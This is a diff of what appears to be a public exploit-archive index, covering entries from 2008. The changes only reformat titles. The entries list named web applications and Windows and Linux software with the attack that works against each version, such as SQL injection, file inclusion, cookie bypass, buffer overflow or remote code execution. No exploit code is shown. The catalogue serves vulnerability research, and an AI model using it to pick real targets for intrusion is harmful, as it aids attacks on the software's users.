5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - (getdata.php id) Blind SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - (id_art) SQL Injection",2008-04-04,"Virangar Security",php,webapps,0 5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - (lng) Local File Inclusion",2008-04-04,w0cker,php,webapps,0 -5370,platforms/php/webapps/5370.txt,"Blogator-script 0.95 Change User Password",2008-04-05,"Virangar Security",php,webapps,0 +5370,platforms/php/webapps/5370.txt,"Blogator-script 0.95 - Change User Password",2008-04-05,"Virangar Security",php,webapps,0 5371,platforms/php/webapps/5371.txt,"Entertainment Directory 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - (forum.php forum) SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5373,platforms/asp/webapps/5373.txt,"CoBaLT 0.1 - Multiple SQL Injection",2008-04-05,U238,asp,webapps,0 @@ -5045,9 +5045,9 @@ id,file,description,date,author,platform,type,port 5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - (matchid) SQL Injection",2008-04-08,0in,php,webapps,0 5411,platforms/php/webapps/5411.txt,"Koobi Pro 6.25 links SQL Injection",2008-04-08,S@BUN,php,webapps,0 5412,platforms/php/webapps/5412.txt,"Koobi Pro 6.25 shop SQL Injection",2008-04-08,S@BUN,php,webapps,0 -5413,platforms/php/webapps/5413.txt,"Koobi Pro 6.25 gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5413,platforms/php/webapps/5413.txt,"Koobi Pro 6.25 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 showimages SQL Injection",2008-04-08,S@BUN,php,webapps,0 -5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0 @@ -5065,7 +5065,7 @@ id,file,description,date,author,platform,type,port 5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 5431,platforms/php/webapps/5431.txt,"Joomla Component joomlaXplorer 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 5432,platforms/php/webapps/5432.txt,"phpAddressBook 2.11 - (view.php id) SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 -5433,platforms/php/webapps/5433.txt,"CcMail 1.0.1 Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0 +5433,platforms/php/webapps/5433.txt,"CcMail 1.0.1 - Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0 5434,platforms/php/webapps/5434.pl,"1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection Exploit",2008-04-13,girex,php,webapps,0 5435,platforms/php/webapps/5435.txt,"Joomla Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0 5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - (pollID) SQL Injection",2008-04-13,S@BUN,php,webapps,0 @@ -5073,7 +5073,7 @@ id,file,description,date,author,platform,type,port 5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service",2008-04-13,j0rgan,windows,dos,0 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps,0 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0 -5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS SQL Injection",2008-04-14,cO2,php,webapps,0 +5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,php,webapps,0 5442,platforms/windows/local/5442.cpp,"Microsoft Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0 5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) SQL Injection",2008-04-14,Stack,php,webapps,0 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - (index.php cat) SQL Injection",2008-04-14,"SoSo H H",php,webapps,0 @@ -5111,7 +5111,7 @@ id,file,description,date,author,platform,type,port 5476,platforms/php/webapps/5476.txt,"HostDirectory Pro Insecure Cookie Handling",2008-04-20,Crackers_Child,php,webapps,0 5477,platforms/php/webapps/5477.txt,"Kubelance 1.6.4 - (ipn.php i) Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0 5478,platforms/php/webapps/5478.txt,"acidcat CMS 3.4.1 - Multiple Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0 -5479,platforms/windows/local/5479.txt,"Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit",2008-04-21,c0ntex,windows,local,0 +5479,platforms/windows/local/5479.txt,"Adobe Album Starter 3.2 - Unchecked Local Buffer Overflow Exploit",2008-04-21,c0ntex,windows,local,0 5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - (view.asp id) SQL Injection",2008-04-21,U238,php,webapps,0 5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - (id) SQL Injection",2008-04-21,ZoRLu,php,webapps,0 5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 - (LngId) SQL Injection Exploit",2008-04-21,"IRM Plc.",asp,webapps,0 @@ -5148,7 +5148,7 @@ id,file,description,date,author,platform,type,port 5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection Exploit",2008-04-27,cO2,php,webapps,0 5514,platforms/php/webapps/5514.pl,"Joomla Component paxxgallery 0.2 - (gid) Blind SQL Injection Exploit",2008-04-27,ZAMUT,php,webapps,0 5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 - (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0 -5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) - SQL Injection",2008-04-28,K-159,php,webapps,0 +5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - (directory.php cat_id) SQL Injection",2008-04-28,K-159,php,webapps,0 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection",2008-04-28,K-159,php,webapps,0 5518,platforms/windows/local/5518.txt,"Microsoft Windows XP SP2 - (Win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0 @@ -5175,7 +5175,7 @@ id,file,description,date,author,platform,type,port 5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit 1.4.0 - (ParentId) SQL Injection Exploit",2008-05-04,JosS,php,webapps,0 5541,platforms/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia 0.2.0 - SQL Injection",2008-05-05,K-159,php,webapps,0 5542,platforms/php/webapps/5542.txt,"Online Rental Property Script 4.5 - (pid) SQL Injection",2008-05-05,K-159,php,webapps,0 -5543,platforms/php/webapps/5543.txt,"Anserv Auction XL (viewfaqs.php cat) - SQL Injection",2008-05-05,K-159,php,webapps,0 +5543,platforms/php/webapps/5543.txt,"Anserv Auction XL - (viewfaqs.php cat) SQL Injection",2008-05-05,K-159,php,webapps,0 5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend 2.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 5545,platforms/php/webapps/5545.txt,"Kmita Mail 3.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 5546,platforms/php/webapps/5546.txt,"BackLinkSpider (cat_id) - SQL Injection",2008-05-05,K-159,php,webapps,0 @@ -5240,8 +5240,8 @@ id,file,description,date,author,platform,type,port 5612,platforms/windows/remote/5612.html,"idautomation bar code ActiveX - Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0 5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 - (browseproject.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 - (detail.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 -5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 -5616,platforms/php/webapps/5616.txt,"ActiveKB 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0 +5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 +5616,platforms/php/webapps/5616.txt,"ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0 5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 5618,platforms/php/webapps/5618.txt,"La-Nai CMS 1.2.16 - (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0 @@ -5253,9 +5253,9 @@ id,file,description,date,author,platform,type,port 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0 5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 - (category.php cat) SQL Injection",2008-05-15,HaCkeR_EgY,php,webapps,0 5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System 2.0 - Arbitrary Add-Admin Exploit",2008-05-15,t0pP8uZz,php,webapps,0 -5628,platforms/php/webapps/5628.txt,"RantX 1.0 Insecure Admin Authentication",2008-05-15,t0pP8uZz,php,webapps,0 +5628,platforms/php/webapps/5628.txt,"RantX 1.0 - Insecure Admin Authentication",2008-05-15,t0pP8uZz,php,webapps,0 5629,platforms/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0 -5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps,0 +5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps,0 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply SQL Injection",2008-05-15,cOndemned,php,webapps,0 5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - (default.asp id) SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0 @@ -5398,7 +5398,7 @@ id,file,description,date,author,platform,type,port 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (XSS/SQL) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) SQL Injection",2008-06-10,Unohope,php,webapps,0 5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) - SQL Injection",2008-06-10,JosS,php,webapps,0 -5776,platforms/php/webapps/5776.txt,"Experts (answer.php) 1.0.0 - SQL Injection",2008-06-10,"CWH Underground",php,webapps,0 +5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - (answer.php) SQL Injection",2008-06-10,"CWH Underground",php,webapps,0 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Remote BoF Exploit",2008-06-10,shinnai,windows,remote,0 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) BoF Exploit (2)",2008-06-10,shinnai,windows,remote,0 5779,platforms/php/webapps/5779.txt,"syndeo CMS 2.6.0 - (LFI/XSS) Multiple Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 @@ -5440,7 +5440,7 @@ id,file,description,date,author,platform,type,port 5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Remote Blind SQL Injection Exploit",2008-06-14,anonymous,php,webapps,0 5816,platforms/php/webapps/5816.pl,"DIY - (index_topic did) Blind SQL Injection Exploit",2008-06-14,Mr.SQL,php,webapps,0 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow PoC",2008-06-14,t0pP8uZz,windows,dos,0 -5818,platforms/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0 +5818,platforms/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0 5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - (bSQL/admin byapss) Multiple Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - (post) SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 5821,platforms/php/webapps/5821.txt,"AlstraSoft AskMe Pro 2.1 - Multiple SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 @@ -5450,7 +5450,7 @@ id,file,description,date,author,platform,type,port 5826,platforms/php/webapps/5826.py,"Simple Machines Forum 1.1.4 - SQL Injection Exploit",2008-06-15,The:Paradox,php,webapps,0 5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow Exploit",2008-06-15,Heretic2,windows,remote,4000 5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - (repquote) SQL Injection",2008-06-15,anonymous,php,webapps,0 -5829,platforms/php/webapps/5829.txt,"SH-News 3.0 Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0 +5829,platforms/php/webapps/5829.txt,"SH-News 3.0 - Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0 5830,platforms/php/webapps/5830.txt,"NiTrO Web Gallery 1.4.3 - (section) SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - (lang) Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 5832,platforms/php/webapps/5832.pl,"MyMarket 1.72 - Blind SQL Injection Exploit",2008-06-16,anonymous,php,webapps,0 @@ -5509,7 +5509,7 @@ id,file,description,date,author,platform,type,port 5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase 0.41 - Blind SQL Injection Exploit",2008-06-21,t0pP8uZz,php,webapps,0 5886,platforms/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 5887,platforms/php/webapps/5887.pl,"LE.CMS 1.4 - Remote Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 -5888,platforms/php/webapps/5888.txt,"CCLeague Pro 1.2 Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps,0 +5888,platforms/php/webapps/5888.txt,"CCLeague Pro 1.2 - Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps,0 5889,platforms/php/webapps/5889.txt,"OFFL 0.2.6 - (teams.php fflteam) SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME - (news.php id) SQL Injection",2008-06-21,"Hussin X",php,webapps,0 5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 - (item.php id) SQL Injection",2008-06-21,"Hussin X",php,webapps,0 @@ -5519,7 +5519,7 @@ id,file,description,date,author,platform,type,port 5896,platforms/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusion",2008-06-22,"CWH Underground",php,webapps,0 5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 - (reverse shell) Blind SQL Injection Exploit",2008-06-22,"Guido Landi",php,webapps,0 -5899,platforms/php/webapps/5899.txt,"PageSquid CMS (index.php page) 0.3 Beta - SQL Injection",2008-06-22,"CWH Underground",php,webapps,0 +5899,platforms/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - (index.php page) SQL Injection",2008-06-22,"CWH Underground",php,webapps,0 5900,platforms/php/webapps/5900.txt,"RSS-Aggregator - (display.php path) Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0 5901,platforms/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 - (plugin_admin.php) Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 @@ -5572,12 +5572,12 @@ id,file,description,date,author,platform,type,port 5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - (itemid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5951,platforms/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion",2008-06-26,CraCkEr,php,webapps,0 -5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0 +5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts - Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0 5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,StAkeR,php,webapps,0 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0 -5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0 +5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 - Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0 5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - (poll.php poll_id) SQL Injection",2008-06-27,Mr.SQL,php,webapps,0 5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod classifieds (lid) SQL Injection",2008-06-27,boom3rang,php,webapps,0 5962,platforms/php/webapps/5962.txt,"poweraward 1.1.0 rc1 - (LFI/XSS) Multiple Vulnerabilities",2008-06-28,CraCkEr,php,webapps,0 @@ -5601,7 +5601,7 @@ id,file,description,date,author,platform,type,port 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 5982,platforms/php/webapps/5982.txt,"php-Agenda 2.2.4 - (index.php page) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 -5984,platforms/php/webapps/5984.txt,"Sisplet CMS (index.php id) 2008-01-24 - SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 +5984,platforms/php/webapps/5984.txt,"Sisplet CMS - (index.php id) 2008-01-24 SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution Exploit",2008-07-01,"Charles Fol",php,webapps,0 5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - (cat_id) SQL Injection",2008-07-01,Kacak,php,webapps,0 @@ -5609,7 +5609,7 @@ id,file,description,date,author,platform,type,port 5989,platforms/php/webapps/5989.txt,"Joomla Component versioning 1.0.2 - (id) SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0 5990,platforms/php/webapps/5990.txt,"Joomla Component mygallery - (cid) SQL Injection",2008-07-01,Houssamix,php,webapps,0 5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - (boardID) SQL Injection",2008-07-02,haZl0oh,php,webapps,0 -5992,platforms/php/webapps/5992.txt,"CMS little (index.php template) 0.0.1 - Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0 +5992,platforms/php/webapps/5992.txt,"CMS little 0.0.1 - (index.php template) Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0 5993,platforms/php/webapps/5993.txt,"Joomla Component com_brightweblinks - (catid) SQL Injection",2008-07-02,His0k4,php,webapps,0 5994,platforms/php/webapps/5994.pl,"Joomla Component QuickTime VR 0.1 - SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 5995,platforms/php/webapps/5995.pl,"Joomla Component is 1.0.1 - Multiple SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 @@ -5662,25 +5662,25 @@ id,file,description,date,author,platform,type,port 6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - (id_cat) SQL Injection",2008-07-11,"Hussin X",php,webapps,0 6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)",2008-07-12,muts,linux,remote,80 6046,platforms/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service PoC",2008-07-12,"Mu Security",multiple,dos,0 -6047,platforms/php/webapps/6047.txt,"Maian Cart 1.1 Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 -6048,platforms/php/webapps/6048.txt,"Maian Events 2.0 Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 -6049,platforms/php/webapps/6049.txt,"Maian Gallery 2.0 Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 -6050,platforms/php/webapps/6050.txt,"Maian Greetings 2.1 Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 -6051,platforms/php/webapps/6051.txt,"Maian Music 1.0 Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 +6047,platforms/php/webapps/6047.txt,"Maian Cart 1.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 +6048,platforms/php/webapps/6048.txt,"Maian Events 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 +6049,platforms/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 +6050,platforms/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 +6051,platforms/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6053,platforms/php/webapps/6053.php,"fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution Exploit (PHP)",2008-07-12,"Inphex and real",php,webapps,0 6054,platforms/php/webapps/6054.pl,"fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution Exploit (Perl)",2008-07-12,"Inphex and real",php,webapps,0 6055,platforms/php/webapps/6055.pl,"Joomla Component n-forms 1.01 - Blind SQL Injection Exploit",2008-07-12,"The Moorish",php,webapps,0 6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition (id) SQL Injection",2008-07-12,Mr.SQL,php,webapps,0 6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - (SQL/LFI) Multiple Vulnerabilities",2008-07-12,S.W.A.T.,php,webapps,0 -6058,platforms/php/webapps/6058.txt,"Avlc Forum (vlc_forum.php id) - SQL Injection",2008-07-12,"CWH Underground",php,webapps,0 +6058,platforms/php/webapps/6058.txt,"Avlc Forum - (vlc_forum.php id) SQL Injection",2008-07-12,"CWH Underground",php,webapps,0 6059,platforms/windows/dos/6059.pl,"Simple DNS Plus 5.0/4.1 - Remote Denial of Service",2008-07-13,Exodus,windows,dos,0 6060,platforms/php/webapps/6060.php,"fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution Exploit",2008-07-13,"Charles Fol",php,webapps,0 -6061,platforms/php/webapps/6061.txt,"Maian Guestbook 3.2 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6062,platforms/php/webapps/6062.txt,"Maian Links 3.1 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6063,platforms/php/webapps/6063.txt,"Maian Recipe 1.2 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6064,platforms/php/webapps/6064.txt,"Maian Weblog 4.0 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6065,platforms/php/webapps/6065.txt,"Maian Uploader 4.0 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6066,platforms/php/webapps/6066.txt,"Maian Search 1.1 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6061,platforms/php/webapps/6061.txt,"Maian Guestbook 3.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6062,platforms/php/webapps/6062.txt,"Maian Links 3.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6063,platforms/php/webapps/6063.txt,"Maian Recipe 1.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6064,platforms/php/webapps/6064.txt,"Maian Weblog 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6065,platforms/php/webapps/6065.txt,"Maian Uploader 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6066,platforms/php/webapps/6066.txt,"Maian Search 1.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - (players-detail.php) Blind SQL Injection Exploit",2008-07-13,DNX,php,webapps,0 6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a Arbitrary Add-Admin",2008-07-13,"CWH Underground",php,webapps,0 6069,platforms/php/webapps/6069.txt,"itechbids 7.0 gold - (XSS/SQL) Multiple Vulnerabilities",2008-07-13,"Encrypt3d.M!nd ",php,webapps,0 @@ -5689,13 +5689,13 @@ id,file,description,date,author,platform,type,port 6072,platforms/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service",2008-07-14,"Jeremy Brown",windows,dos,0 6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0 6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 - (blogpost) Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0 -6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a XSS / SQL Injection",2008-07-15,StAkeR,php,webapps,0 +6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a - XSS / SQL Injection",2008-07-15,StAkeR,php,webapps,0 6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0 6077,platforms/windows/dos/6077.c,"WinRemotePC Full+Lite 2008 r.2server Denial of Service",2008-07-15,Shinnok,windows,dos,0 6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - (sourceFolder) Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - (arcmonth) SQL Injection",2008-07-15,K-159,php,webapps,0 6080,platforms/php/webapps/6080.txt,"php Help Agent 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 -6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0 +6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a - Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0 6083,platforms/windows/dos/6083.html,"Document Imaging SDK 10.95 - ActiveX Buffer Overflow PoC",2008-07-15,r0ut3r,windows,dos,0 6084,platforms/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple SQL Injection",2008-07-15,Mr.SQL,php,webapps,0 @@ -5753,7 +5753,7 @@ id,file,description,date,author,platform,type,port 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL 